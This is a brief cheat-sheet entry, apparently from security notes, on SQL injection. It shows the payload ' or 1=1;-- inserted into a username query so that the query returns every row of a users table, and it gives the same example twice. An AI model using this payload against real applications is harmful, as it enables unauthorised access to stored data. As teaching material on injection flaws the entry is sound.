SQL injection return all items in the table¶
Original SQL
SELECT * FROM users WHERE username = 'Tostadas'
Payload
' or 1=1;--
Result SQL
SELECT * FROM users WHERE username = '' or 1=1;--'
Original SQL
SELECT * FROM users WHERE username = 'Tostadas'
Payload
' or 1=1;--
Result SQL
SELECT * FROM users WHERE username = '' or 1=1;--'